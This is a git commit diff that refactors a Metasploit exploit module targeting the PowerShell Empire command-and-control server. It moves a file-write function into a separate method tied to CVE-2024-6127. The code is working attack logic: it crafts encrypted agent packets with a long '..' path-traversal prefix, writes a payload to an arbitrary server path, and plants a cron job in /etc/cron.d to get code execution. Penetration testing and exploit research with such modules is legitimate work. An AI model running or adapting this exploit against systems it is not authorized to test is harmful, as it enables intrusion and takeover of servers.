Separate write_file function

Takahiro-Yoko · Takahiro-Yoko · commit ed0720dcfdc6 · 2024-07-26T08:32:32.000+09:00
diff --git a/modules/exploits/linux/http/empire_skywalker.rb b/modules/exploits/linux/http/empire_skywalker.rb
@@ -288,30 +288,6 @@ def exploit
       })
       aes_decrypt(session_key, res.body)
 
-      def write_file(path, data, session_id, session_key, staging_key)
-        path = path.split("/").join("\\")
-        encodedPart = compress(data)
-        packet = build_response_packet(
-          TASK_DOWNLOAD,
-          [
-            '0',
-            Array.new(50, '..').join('\\') + path,
-            data.length.to_s,
-            compress(data)
-          ].join('|')
-        )
-        enc_packet = aes_encrypt_then_hmac(session_key, packet)
-        data = build_routing_packet(staging_key, RESULT_POST, enc_packet, session_id)
-
-        res = send_request_cgi({
-          'data'      => data,
-          'method'    => 'POST',
-          'uri'       => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
-          'headers' => {'Cookie' => datastore['AGENT']}
-        })
-        res
-      end
-      fifth_arg = staging_key
       log_path = "/var/lib/powershell-empire/empire/server/downloads/#{session_id}/agent.log"
 
     else
@@ -334,7 +310,6 @@ def write_file(path, data, session_id, session_key, staging_key)
       server_epoch = body[0..9].to_i
       session_key = body[10..-1]
       print_good('Successfully negotiated an artificial Empire agent')
-      fifth_arg = server_epoch
       log_path = '/agent.log'
 
     end
@@ -354,12 +329,20 @@ def write_file(path, data, session_id, session_key, staging_key)
     end
 
     print_status("Writing payload to #{payload_path}")
-    write_file(payload_path, payload_data, session_id, session_key, fifth_arg)
+    if datastore['CVE'] == 'CVE-2024-6127'
+      write_file_cve_2024_6127(payload_path, payload_data, session_id, session_key, staging_key)
+    else
+      write_file(payload_path, payload_data, session_id, session_key, server_epoch)
+    end
 
     cron_path = '/etc/cron.d/' + rand_text_alpha(8)
     print_status("Writing cron job to #{cron_path}")
 
-    write_file(cron_path, cron_file(cron_command), session_id, session_key, fifth_arg)
+    if datastore['CVE'] == 'CVE-2024-6127'
+      write_file_cve_2024_6127(cron_path, cron_file(cron_command), session_id, session_key, staging_key)
+    else
+      write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch)
+    end
     print_status("Waiting for cron job to run, can take up to 60 seconds")
 
     register_files_for_cleanup(cron_path)
@@ -431,4 +414,28 @@ def to_bytes(n, length=1, byteorder='big', signed=false)
     bytes_array.pack('C*')
   end
 
+  def write_file_cve_2024_6127(path, data, session_id, session_key, staging_key)
+    path = path.split("/").join("\\")
+    encodedPart = compress(data)
+    packet = build_response_packet(
+      TASK_DOWNLOAD,
+      [
+        '0',
+        Array.new(50, '..').join('\\') + path,
+        data.length.to_s,
+        compress(data)
+      ].join('|')
+    )
+    enc_packet = aes_encrypt_then_hmac(session_key, packet)
+    data = build_routing_packet(staging_key, RESULT_POST, enc_packet, session_id)
+
+    res = send_request_cgi({
+      'data'      => data,
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
+      'headers' => {'Cookie' => datastore['AGENT']}
+    })
+    res
+  end
+
 end
